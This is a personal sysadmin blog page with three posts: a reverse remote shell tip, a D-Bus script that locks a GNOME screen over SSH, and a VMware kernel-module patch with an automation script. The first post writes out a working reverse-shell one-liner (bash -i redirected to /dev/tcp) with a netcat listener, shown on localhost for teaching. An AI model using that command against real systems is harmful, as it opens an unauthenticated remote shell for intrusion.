Tuesday, March 28, 2017

Tip: Quick and dirty reverse remote shell

Here is how to get a reverse remote shell. I say reverse because the remote system is the one connecting to you. I'll demonstrate it on a single machine for simplicity. So, open a terminal and run the following command in it:
nc -l 12345
This starts netcat listening on port 12345 (that is the OpenBSD netcat / ncat syntax; the traditional netcat wants nc -l -p 12345). Then, in a second terminal, run the following command:
/bin/bash -c 'bash -i >& /dev/tcp/127.0.0.1/12345 0>&1'
At first it looks like nothing happened in the first window (apart from a bare prompt and a warning about missing job control), but type a command there, e.g. pwd, and its output comes back. :) What you've got is a remote shell. Obviously, because of the way things work you don't get line editing, tab completion, job control or other fancy stuff, but it works and that's what matters. :)

What you did is run an interactive bash process (the option -i) with its standard output and standard error redirected to /dev/tcp/127.0.0.1/12345 (the redirection operator >& redirects both) and its standard input taken from the same connection (the last 0>&1 makes descriptor 0 a copy of descriptor 1). The quotes matter: without them the calling shell applies the redirections to the outer /bin/bash -c bash, and the inner bash is not started with -i at all. The path being redirected to is not a real file but a special notation that bash recognizes in redirections and turns into a network connection, i.e. the syntax is:
/dev/<protocol>/<host>/<port>
where the protocol is tcp or udp and the host is an IP address or a host name. More details can be found in the REDIRECTION section of the bash manual page. Two caveats: this is a bash feature, so it does not work in sh or dash, and it only works if bash was built with network redirections enabled, which some distributions have shipped disabled. Also, the connection is plain TCP with no authentication: whoever is listening on that port gets the shell, and everything typed and returned travels unencrypted.

Saturday, February 25, 2017

Lock remote desktop over ssh

I had a seemingly simple problem: connect over SSH to a remote computer and lock its screen. A simple Google search for "gnome lock screen" yielded plenty of results, all of them revolving around the command gnome-screensaver-command -l. First off, the package gnome-screensaver isn't installed by default on Fedora, meaning it isn't used there. Then, after installing it, I got the following error message:
** Message: Failed to get session bus: Error spawning command line 'dbus-launch --autolaunch=062fabbac04041679f56c8db8593c352 --binary-syntax --close-stderr': Child process exited with code 1
OK, it turns out that the session DBus is inaccessible and that gnome-screensaver-command just sends a message over DBus. Using d-feet it was easy to find the object, interface and method to use to lock the screen, but how to reach the session bus was a bit harder. The easy part was finding out that the key is the environment variable DBUS_SESSION_BUS_ADDRESS, which has to point to the DBus daemon's socket. The harder part was finding where that socket is by looking in the usual places on the file system. In the end, the easiest way turned out to be reading the environment of an existing process in the session and taking the value from there, i.e.:
$ cat /proc/`pidof gnome-shell`/environ | \
              tr '\0' '\n' | grep DBUS_SESSION_BUS_ADDRESS
DBUS_SESSION_BUS_ADDRESS=unix:abstract=/tmp/dbus-dl1GC6PYCt,guid=33abd4a9e6bb3dee9262121d5819bdf1
The tr command is necessary because the entries in environ are separated by NUL bytes (they are C strings), so we change them into newlines. Finally, grep just pulls out the entry we are interested in. BTW, sorry for the useless use of cat, but it is a leftover from how I constructed the command. :)

With the environment variable set, it is easy to invoke the Lock() method that locks the screen, i.e.:
dbus-send --print-reply --session \
          --type=method_call --reply-timeout=3000 \
          --dest='org.gnome.ScreenSaver' \
          /org/gnome/ScreenSaver \
          org.gnome.ScreenSaver.Lock
and that will lock the screen. What's left is to glue everything into a script:
#!/bin/bash
# Lock the GNOME session of the user running this script, via its session bus.
# pidof -s returns a single pid; without -s a user with two sessions would get
# two pids and the /proc path below would break.
PID=$(pidof -s gnome-shell) || { echo "gnome-shell is not running" >&2; exit 1; }
# The value itself contains '=', hence -f 2- (everything after the first '=').
DBUS_SESSION_BUS_ADDRESS=$(tr '\0' '\n' < /proc/"${PID}"/environ | grep '^DBUS_SESSION_BUS_ADDRESS=' | cut -d '=' -f 2-) \
dbus-send --print-reply --session --type=method_call --reply-timeout=3000 --dest='org.gnome.ScreenSaver' /org/gnome/ScreenSaver org.gnome.ScreenSaver.Lock
Just copy that into a file, make it executable and try it. It works as long as you run it as the user who owns the session (or as root), because /proc/<pid>/environ is readable only by the process owner and root; over SSH that means logging in as that user. :)
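As an added example (my own code, not the script from the post), here is the same idea split into reusable functions: a parser for the NUL-separated environ format that can be tested on a file, a wrapper that applies it to a live pid and explains the permission failure you get when you are the wrong user, a lookup of the newest gnome-shell of a given user, and the Lock() call plus a GetActive() check to confirm the lock took effect. The function names are mine; org.gnome.ScreenSaver, Lock and GetActive are the real D-Bus names, and the environ file used in the test is constructed.

```shell
#!/usr/bin/env bash
# Added example, not the original post's script. Function names are my own.

# Print the DBUS_SESSION_BUS_ADDRESS value from a NUL-separated environment
# file in /proc/<pid>/environ format. The value contains '=' characters, so
# everything after the first '=' is kept. Fails (exit 1) if the variable is
# absent.
session_bus_address_from_environ() {
    tr '\0' '\n' < "$1" |
        grep '^DBUS_SESSION_BUS_ADDRESS=' |
        head -n 1 |
        cut -d= -f2- |
        grep .
}

# Same thing for a running process. /proc/<pid>/environ is readable only by
# the process owner and root, so over SSH log in as that user or as root.
session_bus_address_from_pid() {
    if [ ! -r "/proc/$1/environ" ]; then
        echo "cannot read /proc/$1/environ (not your process, or no /proc)" >&2
        return 1
    fi
    session_bus_address_from_environ "/proc/$1/environ"
}

# Newest gnome-shell process owned by USER. pidof would return every
# gnome-shell on the box, which breaks the /proc path when a user has two
# sessions or several users are logged in.
gnome_shell_pid_of_user() {
    pgrep -n -u "$1" -x gnome-shell
}

# Session bus address of USER's GNOME session (defaults to the current user).
session_bus_for_user() {
    user=${1:-$(id -un)}
    pid=$(gnome_shell_pid_of_user "$user") || {
        echo "no gnome-shell running for $user" >&2; return 1; }
    session_bus_address_from_pid "$pid"
}

# Lock the screen of USER's session via org.gnome.ScreenSaver.Lock.
lock_gnome_session_of_user() {
    addr=$(session_bus_for_user "$1") || return 1
    DBUS_SESSION_BUS_ADDRESS=$addr dbus-send --print-reply --session \
        --type=method_call --reply-timeout=3000 \
        --dest=org.gnome.ScreenSaver /org/gnome/ScreenSaver \
        org.gnome.ScreenSaver.Lock
}

# Exit 0 if USER's screen is currently locked (GetActive returns true).
gnome_session_locked_of_user() {
    addr=$(session_bus_for_user "$1") || return 1
    DBUS_SESSION_BUS_ADDRESS=$addr dbus-send --print-reply --session \
        --type=method_call --reply-timeout=3000 \
        --dest=org.gnome.ScreenSaver /org/gnome/ScreenSaver \
        org.gnome.ScreenSaver.GetActive | grep -q 'boolean true'
}
```

Typical use over SSH, as root, is `lock_gnome_session_of_user alice && gnome_session_locked_of_user alice && echo locked`. Reading the bus address from gnome-shell rather than from a terminal or sshd process matters because only processes started inside the graphical session carry the right DBUS_SESSION_BUS_ADDRESS.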

Monday, January 30, 2017

Fedora 25, kernel 4.9 and VMWare Workstation 12.5.2

Well, after upgrading Fedora 25, which brought kernel 4.9.5, VMWare Workstation stopped working again! The fix is easy, even though it is annoying to constantly have to patch something in VMWare. Anyway, the procedure, taken from here, is:
  1. Switch to root account.
  2. Go to /usr/lib/vmware/modules/source.
  3. Make backup of files vmmon.tar and vmnet.tar.
  4. Unpack those files using 'tar xf' command.
  5. Patch the file vmnet-only/user_if.c, i.e. open it in your favorite text editor and, in the function UserifLockPage() around line 113, change the following part:
    #if LINUX_VERSION_CODE >= KERNEL_VERSION(4, 6, 0)
        retval = get_user_pages(addr, 1, 1, 0, &page, NULL);
    #else
        retval = get_user_pages(current, current->mm, addr,
                    1, 1, 0, &page, NULL);
    #endif
    with the following:
    #if LINUX_VERSION_CODE >= KERNEL_VERSION(4, 9, 0)
         retval = get_user_pages(addr, 1, 0, &page, NULL);
    #else
    #if LINUX_VERSION_CODE >= KERNEL_VERSION(4, 6, 0)
         retval = get_user_pages(addr, 1, 1, 0, &page, NULL);
    #else
         retval = get_user_pages(current, current->mm, addr,
                     1, 1, 0, &page, NULL);
    #endif
    #endif
  6. Then, in the file vmmon-only/linux/hostif.c, in the function HostIFGetUserPages() around line 1158, change the following:
    #if LINUX_VERSION_CODE >= KERNEL_VERSION(4, 6, 0)
       retval = get_user_pages((unsigned long)uvAddr, numPages, 0, 0, ppages, NULL);
    #else
       retval = get_user_pages(current, current->mm, (unsigned long)uvAddr,
                               numPages, 0, 0, ppages, NULL);
    #endif
    with
    #if LINUX_VERSION_CODE >= KERNEL_VERSION(4, 9, 0)
       retval = get_user_pages((unsigned long)uvAddr, numPages, 0, ppages, NULL);
    #else
    #if LINUX_VERSION_CODE >= KERNEL_VERSION(4, 6, 0)
       retval = get_user_pages((unsigned long)uvAddr, numPages, 0, 0, ppages, NULL);
    #else
       retval = get_user_pages(current, current->mm, (unsigned long)uvAddr,
                               numPages, 0, 0, ppages, NULL);
    #endif
    #endif
  7. Create new vmmon.tar and vmnet.tar using the following commands:
    tar cf vmnet.tar vmnet-only
    tar cf vmmon.tar vmmon-only
  8. Start vmware as you normally would. This triggers the module compilation and everything should work.
Note that you are doing all of this at your own risk! :) One thing to be aware of: in kernel 4.9 the separate write and force arguments of get_user_pages() were replaced by a single gup_flags bitmask (write became FOLL_WRITE), so the 0 passed in the new branches requests no write access, whereas the 4.6 call in vmnet-only passed write = 1. The patch as circulated builds and runs, but that is a semantic change, not just a signature fix.
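As an added example (my own script, not the procedure's source or anything from VMware), the following functions automate the backup, unpack, edit and repack steps. The edit is done mechanically: the first `#if ... KERNEL_VERSION(4, 6, 0)` guard wrapping a one-line get_user_pages() call gets a `KERNEL_VERSION(4, 9, 0)` branch in front of it, with the 4.9 call derived from the 4.6 call by dropping its third argument (the old write argument), which reproduces both replacements shown above. It refuses to patch a file twice and gives up, leaving the file untouched, if the call is not on one line. The paths are those from the post; the function names and the test input are mine.

```shell
#!/usr/bin/env bash
# Added example, not from the original post. Function names are my own.

# Add the 4.9 branch to FILE in place. Exit status: 0 changed, 1 no suitable
# "#if ... KERNEL_VERSION(4, 6, 0)" block found (file left untouched),
# 2 the file already has a 4.9 branch.
add_kernel_4_9_branch() {
    f=$1
    if grep -Fq 'KERNEL_VERSION(4, 9, 0)' "$f"; then
        echo "$f: already has a 4.9 branch, leaving it alone" >&2
        return 2
    fi
    awk '
    # "(a, b, c, rest)" -> "(a, b, rest)": remove the third argument of the
    # get_user_pages() call on this line; "" if the line does not qualify.
    function drop_third_arg(line,    p, i, n, c2, c3) {
        p = index(line, "get_user_pages(")
        if (p == 0) return ""
        n = 0
        for (i = p + 15; i <= length(line); i++) {
            if (substr(line, i, 1) == ",") {
                n++
                if (n == 2) c2 = i
                if (n == 3) { c3 = i; break }
            }
        }
        if (n < 3) return ""
        return substr(line, 1, c2) substr(line, c3 + 1)
    }
    !done && /^[ \t]*#if LINUX_VERSION_CODE >= KERNEL_VERSION\(4, 6, 0\)/ {
        ifline = $0
        if ((getline nxt) <= 0) { print ifline; next }
        call49 = drop_third_arg(nxt)
        if (call49 == "" || nxt !~ /;[ \t]*$/) { print ifline; print nxt; next }
        match(ifline, /^[ \t]*/); indent = substr(ifline, 1, RLENGTH)
        print indent "#if LINUX_VERSION_CODE >= KERNEL_VERSION(4, 9, 0)"
        print call49
        print indent "#else"
        print ifline
        print nxt
        wrapping = 1; depth = 0
        next
    }
    wrapping && /^[ \t]*#if/ { depth++ }
    wrapping && /^[ \t]*#endif/ {
        if (depth == 0) { print; print indent "#endif"; wrapping = 0; done = 1; next }
        depth--
    }
    { print }
    END { exit done ? 0 : 1 }
    ' "$f" > "$f.new" || {
        rm -f "$f.new"
        echo "$f: no one-line get_user_pages() under a 4.6 guard; patch by hand" >&2
        return 1
    }
    mv "$f.new" "$f"
}

# Steps 3, 4, 5/6 and 7 for one tarball: back it up once (TARBALL.orig),
# unpack it next to itself, patch FILE inside the tree, repack.
repack_vmware_module() {
    tarball=$1; file=$2
    dir=$(dirname "$tarball"); name=$(basename "$tarball")
    [ -f "$tarball.orig" ] || cp -p "$tarball" "$tarball.orig"
    ( cd "$dir" && tar xf "$name" ) || return 1
    add_kernel_4_9_branch "$dir/$file" || case $? in 2) ;; *) return 1 ;; esac
    ( cd "$dir" && tar cf "$name" "${file%%/*}" ) || return 1
}

# The whole procedure on a real installation (needs root, step 1).
patch_vmware_modules() {
    src=/usr/lib/vmware/modules/source
    [ "$(id -u)" -eq 0 ] || { echo "run as root" >&2; return 1; }
    repack_vmware_module "$src/vmnet.tar" vmnet-only/user_if.c &&
    repack_vmware_module "$src/vmmon.tar" vmmon-only/linux/hostif.c &&
    echo "done; start vmware to rebuild the modules for $(uname -r)"
}
```

Because the original tarballs are kept as .orig, reverting is a matter of copying them back; and since the function checks for an existing 4.9 branch first, running it after a VMware update that already carries the fix does no harm.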

About Me

scientist, consultant, security specialist, networking guy, system administrator, philosopher ;)